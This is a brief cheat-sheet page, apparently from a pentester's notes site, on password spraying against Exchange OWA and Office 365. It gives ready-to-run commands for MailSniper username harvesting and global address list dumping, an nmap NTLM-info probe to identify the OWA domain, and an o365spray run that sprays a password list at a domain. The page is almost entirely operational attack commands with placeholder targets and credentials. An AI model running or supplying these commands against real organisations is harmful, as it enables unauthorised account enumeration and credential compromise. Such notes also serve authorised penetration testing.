Different Password Spraying tools and methods

MailSniper¹

• Advantages
  • Invoke-UsernameHarvestOWA is very useful
  • Get-GlobalAddressList is awesome
    • bypasses 2FA in Office 365
    • Easily dump list from OWA & Office 365

Invoke-UsernameHarvestOWA -ExchHostname mail.domain.com -UserList .\userlist.txt -Threads 1 -OutFile owa-valid-users.txt
Get-GlobalAddressList -ExchHostname outlook.office365.com -UserName user2@domain.com -Password "P@ssw0rd" -OutFile global-address-list.txt

Find OWA Domain

NMAP

nmap -p 443 -Pn -v mail.domain.com --script http-ntlm-info --script-args http-ntlm-info.root=/rpc/rpcproxy.dll

o365spray²

python3 o365spray.py --spray -U usernames.txt -P passwords.txt --count 2 --lockout 5 --domain test.com

---

1. Github - Dafthack - MailSniper ↩

2. Github - o365spray ↩

---

Last update: May 12, 2021